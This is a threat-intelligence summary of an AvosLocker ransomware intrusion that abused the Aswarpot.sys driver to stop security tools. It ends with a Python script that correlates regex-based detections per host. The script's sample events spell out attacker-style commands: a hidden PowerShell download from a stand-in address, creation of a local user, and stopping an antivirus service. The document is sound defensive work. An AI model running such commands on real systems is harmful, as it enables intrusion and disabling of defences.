AvosLocker Infection with Abused Driver
Industry: N/A | Level: Tactical | Source: TrendMicro
Trend Micro observed an AvosLocker infection chain deployed in the US that abused a legitimate Windows driver for defense evasion and to disable security defenses. Initial access leveraged a vulnerability in Zoho ManageEngine ServiceDesk Plus (telemetry did not identify the exact CVE used) to upload a webshell. Following command-and-control activity, mshta.exe was used to execute the attacker's HTA file, which spawned a PowerShell script. Discovery of system information was carried out along with PowerShell downloads of attacker tools, including AnyDeskMSI, Mimikatz, Nmap, PDQ Deploy and Netscan, and the creation of an administrator account. A legitimate driver, Aswarpot.sys, was used from a PowerShell script to disable security products by stopping their services. Throughout the attack the attackers attempted to copy a number of their tools, including Mimikatz and Impacket, but these efforts were blocked. Nmap was used to identify hosts vulnerable to Log4j. Lastly, using the deployment tool PDQ, a batch script was launched on multiple hosts in the victim network.
- Anvilogic Scenario: AvosLocker Infection with Abused Driver
- Anvilogic Use Cases:
  - Potential Web Shell
  - MSHTA.exe execution
  - Common Reconnaissance Commands
  - Invoke-WebRequest Command
  - MSIExec Install MSI File
  - Create/Add Local/Domain User
  - Service Stop Commands
  - Windows Copy Files
  - Driver as Command Parameter
  - Mimikatz
  - Wscript/Cscript Execution
  - Impacket/Empire's WMIExec
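The chain above is a sequence of individually noisy behaviours (mshta.exe launching an HTA, PowerShell downloads, an MSI install, a new local user, service stops, a driver path passed as a parameter) that only becomes a high-confidence signal when several of them land on the same host. The following Python is an added example, not Anvilogic's or Trend Micro's code: it runs a handful of regex rules, named after the use cases listed above, over constructed process-creation events and then correlates distinct rule hits per host to produce a scenario-style alert. The event shape (`host`, `parent`, `image`, `cmdline`), the sample events, the `Aswarpot.sys` path, the hypothetical `disable.ps1` script and the threshold of three distinct rules are all constructed assumptions; only the file name `Aswarpot.sys` and the use-case names come from the write-up.

```python
"""Correlate several low-fidelity process-creation detections into one per-host alert.

Added example (not from the original write-up). Event dicts, sample values and
the rule regexes are constructed for illustration; tune them against real telemetry.
"""
import re

# (use-case name, regex applied to "image cmdline"). Names mirror the use cases on the page.
RULES = [
    ("MSHTA.exe execution",
     re.compile(r"\bmshta\.exe\b.*\.hta\b", re.I)),
    ("Common Reconnaissance Commands",
     re.compile(r"\b(systeminfo|whoami|ipconfig|nltest)\b", re.I)),
    ("Invoke-WebRequest Command",
     re.compile(r"\b(invoke-webrequest|iwr)\b", re.I)),
    ("MSIExec Install MSI File",
     re.compile(r"\bmsiexec\.exe\b.*\s/i\b.*\.msi\b", re.I)),
    ("Create/Add Local/Domain User",
     re.compile(r"\bnet1?(\.exe)?\s+user\b.*\s/add\b", re.I)),
    ("Service Stop Commands",
     re.compile(r"(\bsc(\.exe)?\s+stop\b|\bstop-service\b)", re.I)),
    # A .sys file given as an argument (the write-up's Aswarpot.sys case), not the image itself.
    ("Driver as Command Parameter",
     re.compile(r"\s\S+\.sys\b", re.I)),
]

# Constructed sample telemetry: web01 replays the chain, app02 is ordinary admin activity.
SAMPLE_EVENTS = [
    {"host": "web01", "parent": "w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"host": "web01", "parent": "w3wp.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\Public\update.hta"},
    {"host": "web01", "parent": "mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -nop -w hidden Invoke-WebRequest -Uri http://192.0.2.10/tools.zip -OutFile C:\ProgramData\tools.zip"},
    {"host": "web01", "parent": "powershell.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\ProgramData\AnyDesk.msi /qn"},
    {"host": "web01", "parent": "powershell.exe",
     "image": r"C:\Windows\System32\net.exe", "cmdline": "net user svc_backup /add"},
    {"host": "web01", "parent": "powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -c "Stop-Service -Name ExampleAVService -Force"'},
    {"host": "web01", "parent": "powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # disable.ps1 and its -Driver switch are hypothetical; the driver name is from the write-up.
     "cmdline": r"powershell.exe -File C:\ProgramData\disable.ps1 -Driver C:\ProgramData\Aswarpot.sys"},
    {"host": "app02", "parent": "explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Service"},
    {"host": "app02", "parent": "services.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Windows\Installer\update.msi /qn"},
]


def match_rules(event):
    """Return the names of every rule that fires on one event, in RULES order."""
    text = f"{event['image']} {event['cmdline']}"
    return [name for name, pattern in RULES if pattern.search(text)]


def correlate(events, min_rules=3):
    """Group rule hits by host; flag hosts with at least min_rules distinct use cases."""
    hits_per_host = {}
    for event in events:
        hits_per_host.setdefault(event["host"], set()).update(match_rules(event))
    return {host: sorted(rules) for host, rules in hits_per_host.items()
            if len(rules) >= min_rules}


if __name__ == "__main__":
    for host, rules in correlate(SAMPLE_EVENTS).items():
        print(f"[scenario] {host}: {len(rules)} distinct use cases -> {', '.join(rules)}")
```

With the defaults only `web01` is reported, because the single benign MSI install on `app02` never reaches the threshold; lowering `min_rules` to 1 turns the script back into a flat per-use-case alert feed, which is the trade-off the scenario approach is meant to avoid.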